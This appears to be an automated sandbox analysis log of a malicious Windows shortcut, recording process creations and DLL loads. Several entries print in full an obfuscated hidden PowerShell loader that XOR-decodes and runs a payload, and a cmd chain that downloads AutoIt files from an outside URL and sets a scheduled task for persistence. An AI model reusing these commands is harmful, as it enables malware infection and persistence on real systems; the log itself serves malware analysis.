Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h c:\GSlLzFnTov
Source: C:\Windows\System32\cmd.exe	Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0
Source: C:\Windows\System32\cmd.exe	Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h c:\GSlLzFnTov
Source: C:\Windows\System32\cmd.exe	Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0
Source: C:\Windows\System32\cmd.exe	Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h c:\GSlLzFnTov	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ\|\|goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h c:\GSlLzFnTov
Source: C:\Windows\System32\cmd.exe	Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0
Source: C:\Windows\System32\cmd.exe	Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"

Source: C:\Windows\System32\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000006.00000002.1436302402.000002632961D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1453710911.0000026329A81000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000006.00000002.1453411821.0000026329A40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000006.00000002.1453710911.0000026329A81000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n.pdb source: powershell.exe, 00000006.00000002.1437718358.0000026329676000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: lib.pdb source: powershell.exe, 00000006.00000002.1436302402.000002632961D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: on.pdb source: powershell.exe, 00000006.00000002.1437718358.0000026329676000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.1453710911.0000026329A81000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1437718358.0000026329676000.00000004.00000020.00020000.00000000.sdmp
